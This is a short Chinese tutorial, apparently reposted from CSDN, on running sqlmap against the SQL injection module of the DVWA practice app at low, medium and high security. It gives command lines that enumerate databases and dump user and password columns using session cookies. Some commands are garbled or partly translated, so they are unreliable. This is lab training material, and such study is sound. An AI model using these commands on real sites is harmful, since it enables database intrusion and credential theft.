DVWA之SQL注入(dvwa之sql注入漏洞原理)

DVWA之SQL注入Low
DVWA的SQL是需要带有cookie才使用sqlmap工具
当前cookie为“securitylow; PHPSESSIDkv2letojiec8rlhl7lu3eqqeg2”
sqlmap.py -u

Low

DVWA的SQL需要cookie才能使用sqlmap工具

当前cookie 为“security=low; PHPSESSID=kv2letojiec8rlhl7lu3eqqeg2”。

sqlmap.py -u \’http://ip:port/vulnerability/sqli/?id=1Submit=Submit#\’ –cookie \’security=low; PHPSESSID=kv2letojiec8rlhl7lu3eqqeg2\’ –dbs

执行后,将检索数据库类型和版本(MySQL、SQLserver.)、网站使用的Web 服务器(Apache、Nginx.)以及数据库名称。

要知道网站使用的数据库可以通过“–current-db”来获取。

搜索数据库可以使用“–columns”来获取数据库下的表以及表下的字段(需要添加指定的数据库名称)。

要检索表中字段的数据,请使用“–dump -D \’数据库名称\’ -T \’表名称\’ -C \’字段\’”。以用户表的用户和密码字段为例。

Medium

该级别的发帖方式为POST,所以

因此,由于使用了\’–data\’,并且表单数据为id=1,Submit=Submit,因此可以构造为\’–data \’id=1Submit=Submit\’,并且也需要该级别的cookie来做到这一点。被带来。

sqlmap.py -u \’http://ip:port/vulnerability/sqli/#\’ –data \’id=1Submit=提交\’ –cookie \’security=medium;

结果与下层类似,但使用的命令不同。

后续操作不仅仅是低级的“–data \’id=1Submit=Submit\’”。

High

高级别与前一级别有很大不同,并且具有二级URL。

其他操作均以此为基础进行

sqlmap.py -u \’http://第一个ip:port/vulnerability/sqli/\’–data \’ –cookie \’security=high; PHPSESSID=l5h3q5stmi71iup77k7mbfnpg4\’ –second-url \’第二个ip:port/vulnerability/sqli/session -input .php\’ –数据库

以上#DVWA中SQL注入相关内容来源仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92841.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月4日 下午4:35
下一篇 2024年7月4日 下午4:36

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注